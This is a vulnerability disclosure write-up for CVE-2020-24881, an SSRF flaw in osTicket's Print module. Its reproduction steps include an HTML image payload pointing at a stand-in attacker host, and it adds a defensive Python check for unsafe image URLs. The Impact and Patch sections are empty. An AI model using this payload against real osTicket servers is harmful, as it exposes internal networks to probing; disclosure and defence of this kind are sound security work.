CVE-2020-24881: Server Side Request Forgery in osTicket


Server Side Request Forgery in osTicket

While working on a penetration testing project (let’s say for abc company), I came across their support portal. They were using osTicket 1.12.x. On digging further, I discovered that the “Print” module is vulnerable to Server Side Request Forgery (SSRF). I’ll try to keep this write-up as simple as possible.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

“osTicket is a widely-used open source support ticket system. It seamlessly integrates inquiries created via email, phone and web-based forms into a simple easy-to-use multi-user web interface. Manage, organize and archive all your support requests and responses in one place.”

Exploiting CVE-2020-24881

  1. Click on any ticket [Open or Closed].
  2. In the “Post a Reply” section, click on HTML Editor.
  3. I tried different HTML elements like iframe and embed, but none of them worked. :( Try using the following payload:
  4. <img src="https://attacker.com">
  5. Post the reply and then click on the “Print” button and TA-DAA!


  6. You’ll receive a request from the internal IP of the victim machine. I used Burp Suite’s Collaborator server, and below is the output:
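As an added, defender-side example (not osTicket’s code or its patch), the check below vets every <img src> in a reply body before a server-side renderer such as the print module would fetch it: it rejects non-HTTP schemes, hosts outside an optional allow-list, and any literal or resolved address that is not publicly routable. The function names, the injectable resolve parameter and the allow-list are assumptions made for this illustration.

```python
import ipaddress
import socket
from html.parser import HTMLParser
from urllib.parse import urlparse

def default_resolve(host):
    """Resolve a hostname to every address it maps to (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def _is_global(addr):
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:10.0.0.5 as the IPv4 it wraps
    # False for RFC 1918, loopback, link-local (incl. the 169.254.169.254
    # cloud-metadata address), CGNAT, ULA and the documentation/test ranges.
    return ip.is_global

def is_safe_fetch_target(url, resolve=default_resolve, allowed_hosts=None):
    """True only if the renderer may fetch `url`; fails closed on any doubt."""
    parts = urlparse(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return False  # file:, gopher:, data: and friends are never fetched
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False
    try:
        ipaddress.ip_address(host)  # literal IP: judge it without a lookup
        addrs = {host}
    except ValueError:
        try:
            addrs = resolve(host)
        except OSError:
            return False
    # A name that resolves to one public and one private address is still a
    # route to the private one, so every address must pass.
    return bool(addrs) and all(_is_global(a) for a in addrs)

class _ImgSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)

def unsafe_img_sources(html, resolve=default_resolve, allowed_hosts=None):
    """List the <img src> targets in `html` that the renderer must not fetch."""
    parser = _ImgSrcCollector()
    parser.feed(html)
    return [s for s in parser.srcs if not is_safe_fetch_target(s, resolve, allowed_hosts)]
```

The lookup here and the renderer’s own lookup are separate, so a DNS answer can change between them (rebinding); in production, connect to the vetted address rather than re-resolving, or run this check inside the HTTP client’s connect hook.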


Impact

Patch

Thanks for reading this write-up!

Linkedin: https://www.linkedin.com/in/talat-mehmood-1a10b2142/

Twitter: https://twitter.com/Blackbatsecuri1
